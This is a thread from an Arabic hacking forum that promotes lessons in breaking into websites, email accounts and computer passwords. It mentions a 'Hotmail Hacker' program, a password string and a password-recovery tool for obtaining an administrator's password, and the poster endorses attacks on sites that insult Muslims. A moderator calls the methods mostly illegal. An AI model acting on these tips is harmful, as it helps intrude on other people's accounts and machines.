          # Point & click your way to your own online store in five minutes!
          # The best part is that it comes *FREE* with your server!
          # Take a look at all of these fantastic features....

          End of submission
          Thank you for using RESPONSE-O-MATIC!
          -----------------------------------------------------------------------

          ماراح يهمنى إلا شي واحد بس وهو الباسوورد
          passwd: fghg46g4h6g4g6hhg

          ملاحظة مهمة:-((البرنامج لايمكن تطبيقه على نفسك لأنه على جهاز واحد

          برنامج Hotmail Hacker


          [email protected]

          تعليق

          • thanks_god
            موقوف
            • Jul 2004
            • 20

            #6
            معرفة كلمة سر المسؤول

            وهي عملية سهلة جدا ا ذ يكفي تحميل, Advanced Windows Password recovery
            و لتحميله يكفي البحث عليه في قوقل مع العلم أن استعماله سهل جدا.

            تعليق

            • thanks_god
              موقوف
              • Jul 2004
              • 20

              #7
              أرجو التثبيت/ دروس نادرة في اختراق المواقع الأميلات , الشبكات و كلمة مرور الكمبيوتر

              السلام على من أتبع الهدى.
              أرجو رجاءا خاصا من المشرف العام التثبيت و لو لفترة.
              أرجو من الأخوان المسؤولين في تونس الحبيبة تفهم أن هدفي هو تعليمي بحت...
              أود في البداية تقديم نفسي أسمي نجيب من تونس و هذه بعض الدروس المجمعة أود تقديمها هدية في أول تدخل في هذا المنتدى العالمي لكن البداية أود الأشارة لأنه لا مكان لأصحاب النفوس الخبيثة طبعا ليس بأستطاعتي منع أحد من أستخدام هذه الطرق للاختراق لكن كل واحد منكم تقوده درجة ايمانه في استخدام هذه الوسائل والله في عون كل من يستخدمها لا على المسلم مهما كان اختلافه معه بل ضد المواقع و الأشخاص التي تهين المسلم.
              ملاحظة هامة : كل من يستخدم هذه الطرق أنا لست مسؤولا عنه فالهدف هو تثقيف الاخوان الزوار فقط و كفى

              تعليق

              • thanks_god
                موقوف
                • Jul 2004
                • 20

                #8
                الرد: أرجو التثبيت دروس نادرة في اختراق المواقع الأميلات الشبكات و كلمة مرور الكمبيوتر1 1

                merci pour les réponses!!!

                est ce que le sujet est n'a pas important de cette façon pour n'est pas répondre ou quoi?

                تعليق

                • عادل البدري
                  مساعد المدير العام لشؤون المنتدى

                  • May 2004
                  • 9587

                  #9
                  الرد: أرجو التثبيت دروس نادرة في اختراق المواقع الأميلات الشبكات و كلمة مرور الكمبيوتر1 1

                  الصراحة الموضوع هو سلاح ذو حدين
                  وفي النهاية معظم الوسائل هي غير مشروعة لذا نأسف على عدم التثبيت
                  تحياتي

                  تعليق

                  • تبسيط
                    عضو
                    • Mar 2005
                    • 15

                    #10
                    الرد: أرجو التثبيت دروس نادرة في اختراق المواقع الأميلات الشبكات و كلمة مرور الكمبيوتر1 1

                    جهد تشكر عليه أخي الكريم thanks god

                    وفقك الله إلى كل خير. ونطمع بالمزيد من إبداعاتك .

                    تعليق

                    • raouf diak
                      موقوف
                      • Feb 2005
                      • 884

                      #11
                      الرد: أرجو التثبيت دروس نادرة في اختراق المواقع الأميلات الشبكات و كلمة مرور الكمبيوتر1 1

                      مشكوووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووور

                      تعليق

                      • ابو سمرة
                        عضو فعال
                        • May 2004
                        • 74

                        #12
                        الرد: أرجو التثبيت دروس نادرة في اختراق المواقع الأميلات الشبكات و كلمة مرور الكمبيوت

                        تسلم اخي الكريم موضوع شيق الله لايحرمنة منك ومن علمك .
                        تسمحلي اطلب منك طرق حماية واختراق الشبكات بس باللينكس لو تفضلت مع الشكر الجزيل مقدماً
                        حيدرابو سمرة

                        تعليق

                        مواضيع مرتبطة

                        Collapse

                        جاري العمل...